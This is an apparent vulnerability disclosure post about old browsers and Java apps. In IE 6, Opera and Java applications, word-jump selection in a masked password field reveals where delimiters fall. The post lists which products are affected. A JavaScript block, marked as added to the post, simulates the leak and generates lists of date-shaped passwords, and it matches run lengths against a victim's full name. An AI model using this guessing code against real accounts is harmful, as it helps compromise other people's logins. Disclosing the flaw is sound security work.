Hi,

Microsoft's IE has a feature for storing login passwords for future use. With (at least) IE 6 on Win2k SP3 (as well as others, see below), if you see a login screen with an <input type="password" ...> tag and the cached password appears as asterisks, place the caret at the beginning of the string and press Ctrl+Shift+Right Arrow to select the whole string. If the password contains any delimiter (e.g. a space, colon, comma, etc.) the selection will stop before it. That means the next character is a delimiter.

One might say, "Why bother? Snadboy's Revelation will give me the cleartext password!" Well, this may be true for IE, but the same thing happens with apps built with Java (tested on JDK 1.3), which Revelation doesn't reveal. By knowing that a delimiter exists and where it is, the number of characters, and some social engineering sense, one may guess the password.

Example 1: Many people use dates as their passwords. These usually match the regex '^([0-9]{1,2}[\/\-\.]){2}[0-9]{2,4}$', so if you can tell that the password matches that shape (two short runs, then a two- or four-character run, each separated by a single delimiter), guessing/brute forcing becomes much easier.

Example 2: Some people tend to use their full name, so a single separator between two parts whose lengths match the parts of the victim's full name means even easier guessing.

I haven't tested on *NIX yet.
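The following is an added example, not code from the original post. It models what the word-jump selection trick leaks (total length, the lengths of the unbroken runs, and the delimiter offsets) and then shows how much that shrinks the guessing space for the two cases above. It assumes, as the post describes, that Ctrl+Shift+Right from the start of the field extends the selection up to but not including the next delimiter, and that the total length is known from the number of asterisks. All sample passwords and names are constructed for the example.

```javascript
// Added example (not part of the original post).
// Assumption: the word jump stops at any non-alphanumeric character, and the
// attacker can repeat it, so every delimiter offset is learned.
const DELIMITER_RE = /[^A-Za-z0-9]/;

// Simulate repeated Ctrl+Shift+Right over a masked field.
// Returns what the attacker observes: total length, run lengths, delimiter offsets.
function wordJumpLeak(secret) {
  const segments = [];
  const delimiterAt = [];
  let run = 0;
  for (let i = 0; i < secret.length; i++) {
    if (DELIMITER_RE.test(secret[i])) {
      delimiterAt.push(i);
      if (run > 0) segments.push(run);
      run = 0;
    } else {
      run++;
    }
  }
  if (run > 0) segments.push(run);
  return { length: secret.length, segments, delimiterAt };
}

// Shape test for the date pattern: two 1-2 char fields and a 2-4 char year,
// separated by exactly two single-character delimiters and nothing else.
function looksLikeDate(leak) {
  if (leak.segments.length !== 3 || leak.delimiterAt.length !== 2) return false;
  const [d, m, y] = leak.segments;
  return d >= 1 && d <= 2 && m >= 1 && m <= 2 && y >= 2 && y <= 4 &&
    leak.delimiterAt[0] === d && leak.delimiterAt[1] === d + 1 + m;
}

// Shape test for "full name with one separator": run lengths equal the name parts.
function looksLikeFullName(leak, fullName) {
  const parts = fullName.trim().split(/\s+/).map((p) => p.length);
  return leak.segments.length === parts.length &&
    leak.segments.every((n, i) => n === parts[i]);
}

function pad(n, width) { return String(n).padStart(width, '0'); }

// Enumerate every date string consistent with the leaked shape. Assumption to keep
// the list small: the same separator character is used in both delimiter slots.
function dateCandidates(leak, yearFrom, yearTo, separators = ['/', '-', '.']) {
  const [dLen, mLen, yLen] = leak.segments;
  const days = [], months = [], years = [];
  for (let d = 1; d <= 31; d++) if (pad(d, dLen).length === dLen) days.push(pad(d, dLen));
  for (let m = 1; m <= 12; m++) if (pad(m, mLen).length === mLen) months.push(pad(m, mLen));
  for (let y = yearFrom; y <= yearTo; y++) {
    const s = yLen === 2 ? pad(y % 100, 2) : String(y);
    if (s.length === yLen && !years.includes(s)) years.push(s);
  }
  const out = [];
  for (const sep of separators)
    for (const d of days)
      for (const m of months)
        for (const y of years) out.push(`${d}${sep}${m}${sep}${y}`);
  return out;
}

// Size of a blind search over printable ASCII for the same length, for comparison.
function naiveKeyspace(length, alphabetSize = 95) {
  return Math.pow(alphabetSize, length);
}

// Constructed sample: what the attacker sees for a date-shaped password.
const leak = wordJumpLeak('25/12/1955');
console.log(leak);                                   // { length: 10, segments: [2, 2, 4], delimiterAt: [2, 5] }
console.log(looksLikeDate(leak));                    // true
const candidates = dateCandidates(leak, 1940, 1989);
console.log(candidates.length, 'vs', naiveKeyspace(leak.length));
console.log(looksLikeFullName(wordJumpLeak('john smith'), 'John Smith')); // true
```

The point of the comparison at the end is that the shape alone turns a 10-character blind search into a list of a few tens of thousands of dates, which any login form or offline guesser will get through quickly; the same function set works for the full-name case by checking run lengths against the victim's known name.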
Tested on:
=======
* Internet Explorer 6 (on Win2k Pro SP3) =====> Vulnerable
* Netscape Navigator (on Win2k Pro SP3) =====> Not Vulnerable
* Mozilla (on Win2k Pro SP3) =====> Not Vulnerable
* Opera 6.02 (on Win2k Pro SP3) =====> Vulnerable
* Java based applications/applets (JDK 1.3) =====> Vulnerable
* Visual C++ 6 (MFC 4.2) applications =====> Not Vulnerable
* Visual Basic 6 applications =====> Not Vulnerable

Peace
NP-completer
XEgypt.org